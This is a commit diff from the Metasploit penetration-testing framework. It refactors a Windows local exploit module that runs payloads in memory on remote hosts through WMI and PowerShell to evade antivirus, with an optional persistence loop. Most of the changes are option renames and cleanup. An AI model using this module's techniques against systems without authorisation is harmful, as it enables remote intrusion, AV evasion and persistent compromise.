Address void-in's comments

RageLtMan · RageLtMan · commit 4a79e75af9ba · 2016-03-05T02:13:24.000-05:00
Drop session type check
Camel case advanced options
Clean up persistence, dry run, and error messages.
Clean up copyright/license clause.
diff --git a/modules/exploits/windows/local/ps_wmi_exec.rb b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -1,13 +1,8 @@
 # -*- coding: binary -*-
-##
-# $Id$
-##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 ##
@@ -29,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info,
-      'Name'                 => "Current User WMI Exec Powershell",
+      'Name'                 => "Authenticated WMI Exec via Powershell (Local Exploit)",
       'Description'          => %q{
         This module uses WMI execution to launch a payload instance on a remote machine.
         In order to avoid AV detection, all execution is performed in memory via psh-net
@@ -49,6 +44,7 @@ def initialize(info={})
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets' => [ [ 'Universal', {} ] ],
       'DefaultTarget' => 0,
+      'DisclosureDate'=> "Aug 19 2012"
 
     ))
 
@@ -63,8 +59,8 @@ def initialize(info={})
 
     register_advanced_options(
       [
-        OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
-        OptBool.new('RUN_REMOTE_WOW64', [
+        OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']),
+        OptBool.new('RunRemoteWow64', [
           false,
           'Execute powershell in 32bit compatibility mode, payloads need native arch',
           false
@@ -86,7 +82,7 @@ def build_script
 
     # Create base64 encoded payload
     psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
-    if datastore['PERSIST']
+    if datastore['PowerShellPersist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
@@ -97,7 +93,7 @@ def build_script
     # Build WMI exec calls to every host into the script to reduce PS instances
     # Need to address arch compat issue here, check powershell.exe arch, check pay arch
     # split the hosts into wow64 and native, and run each range separately
-    ps_bin = datastore['RUN_REMOTE_WOW64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
     # for whatever reason, passing %systemroot% instead of 'C:\windows' fails
 
     if datastore["RHOSTS"]
@@ -125,8 +121,8 @@ def exploit
 
     # Make sure we meet the requirements before running the script
     # Shell sessions can't kill PIDs
-    if !(session.type == "meterpreter" || have_powershell?)
-      print_error("Incompatible Environment")
+    if !have_powershell?
+      print_error("Incompatible environment - PowerShell is required")
       return
     end
     # SYSTEM doesnt have credentials on remote hosts
@@ -136,10 +132,14 @@ def exploit
     end
 
     script = build_script
-print_good script if datastore['PSH::dry_run']
+
+    if datastore['Powershell::Post::dry_run']
+      print_good script
+      return
+    end
     #
     print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}")
-    print_good('Finished!')
+    vprint_good('PSH WMI exec is complete.')
   end
 
   # Wrapper function for instantiating a WMI win32_process
@@ -177,7 +177,6 @@ def ps_wmi_exec(opts = {})
 
 EOS
 
-
   return ps_wrapper
   end
 
